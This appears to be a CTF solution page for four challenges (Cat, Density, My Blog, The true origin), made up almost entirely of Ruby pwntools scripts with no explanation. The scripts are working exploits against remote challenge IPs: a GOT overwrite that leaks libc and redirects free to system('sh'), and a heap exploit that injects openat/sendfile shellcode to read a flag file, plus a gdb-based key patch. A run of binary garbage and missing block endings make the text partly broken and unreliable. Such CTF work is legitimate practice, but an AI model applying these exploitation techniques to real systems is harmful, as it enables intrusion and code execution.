* Cat (pwn 68pts)

* Density (rev 148pts)

* My Blog (pwn 147pts)

* The true origin (rev/crypto 394pts)

require 'pry'

require 'pwn' # https://github.com/peter50216/pwntools-ruby

require 'heapinfo' # https://github.com/david942j/heapinfo

require 'one_gadget' # https://github.com/david942j/one_gadget

host, port = '178.62.40.102', 6000

@local = false

if ARGV.empty?

host = '127.0.0.1'; @local = true

raise ArgumentError, 'host not set' if host.empty?

$z = Sock.new host, port

def z;$z;end

@p = 'Cat'

def h;@h ||= heapinfo(@p);end

def elf; @elf ||= ELF.new(@p); end

context.arch = 'amd64'

def pt; z.gets '> '; end

def create(name, kind, old = 1)

pt; z.puts 1

pt; z.write name

pt; z.write kind

pt; z.puts old

def edit(id, name, kind, yn)

pt; z.puts 2

pt; z.puts id

pt; z.write name

pt; z.write kind

pt; z.puts 1

pt; z.puts yn

def free(id)

pt; z.puts 5

pt; z.puts id

create('meow', 'meowkind'); id = 0

edit(id, 'z', 'z', 'n')

ptr_6 = 0x6020a0 + 6 * 8

create('AAAA', ptr_6.p32); # 1

edit(id, p32(elf.got.puts - 16), 'A', 'y')

pt; z.puts 3; pt; z.puts 6 # show id 6

puts_off = 0x6f690

z.gets 'old: '; libc = z.gets.to_i - puts_off

log.dump libc.hex

create("la", "lala"); id = 1

edit(id, 'zz', 'zzz', 'n')

create('AAAA', elf.got.free.p32) # 2

system_off = 0x45390

edit(id, (libc + system_off).p64[0, 7], 'sh;', 'n')

;����p�K��W~s�]���,?�
"��C{���~-��4{��J�r[>w�t����������[�

require 'base64'

data = IO.binread('short_adff30bd9894908ee5730266025ffd3787042046dd30b61a78e6cc9cadd72191')

puts Base64.strict_encode64(data)

.gsub('++e', '{')

.gsub('+d', '}')

.gsub('+c', '_')

require 'pry'

require 'pwn' # https://github.com/peter50216/pwntools-ruby

require 'heapinfo' # https://github.com/david942j/heapinfo

require 'one_gadget' # https://github.com/david942j/one_gadget

host, port = '159.65.125.233', 31337

@local = false

if ARGV.empty?

host = '127.0.0.1'; @local = true

raise ArgumentError, 'host not set' if host.empty?

$z = Sock.new host, port

def z;$z;end

@p = 'myblog'

def h;@h ||= heapinfo(@p);end

def elf; @elf ||= ELF.new(@p); end

context.arch = 'amd64'

rand_buf = `./rnd`.to_i

log.dump rand_buf.hex

def cmd(id)

z.gets "Exit\n"

z.write id.to_s.ljust(16, "\x00")

def create(content = 'A' * 47, author = 'B' * 7)

cmd(1)

z.gets "Input"; z.write content

z.gets "Input"; z.write author

def fast_create(content = 'A' * 47, author = 'B' * 7)

z.write 1.to_s.ljust(16, "\x00")

z.write content

z.write author

0x41.times { fast_create }

0x41.times { z.gets "Exit" }

def change(t)

cmd(3)

z.gets 'Owner : '

z.write t.ljust(7, "\x00")

def free(id)

cmd(2)

z.gets 'index'

z.puts id

z.gets '0x'

z.puts 'A' # do nothing

elf_base = z.gets.to_i(16) - 0xef4

change(p64(elf_base + 0x202040)[0, 6])

free(-1) # free rand_buf

create('A' * 8 + p64(rand_buf + 8))

z.gets 'Old Owner : '

heap = (z.recvn(6) + "\x00\x00").u64 - 0x260

z.write asm("xchg eax, ebx; xor edi, edi; push rbp; pop rsi; syscall")

z.gets '0x'

z.write 'A' * 8 + (rand_buf + 0xf).p64 + p64(rand_buf + 8)

z.write asm(

shellcraft.pushstr('/home/pwn/flag') +

shellcraft.syscall('SYS_openat', -100, 'rsp', 0, 0) +

shellcraft.syscall('SYS_sendfile', 1, 'rax', 0, 2147483647) +

shellcraft.exit(0)

#include <stdio.h>

#include <time.h>

#include <stdlib.h>

int main() {

srand(time(NULL));

printf("%d\n", rand() & 0xfffff000);

return 0;

}

6eacb9390c617f4201b9261cb033416cad93f4fc9d0131dd84e3b0860bbaf690f3e3d4f068f14473abdb4f81c7d8c44e98c70bd8fe7ef2c3e0c9964297603824

require 'pwn' # https://github.com/peter50216/pwntools-ruby

require 'gdb' # https://github.com/david942j/gdb-ruby

dec = IO.binread('flag.enc').strip.unhex

IO.binwrite('test', dec)

gdb = GDB::GDB.new('true_origin')

base = 0x555555554000

gdb.b(base + 0x152a) # 1

key = gdb.readm(gdb.reg('rsi'), 40)

log.dump key

gdb.writem(gdb.reg('rsi'), key[20, 20])

gdb.writem(gdb.reg('rsi') + 20, key[0, 20])

puts gdb.continue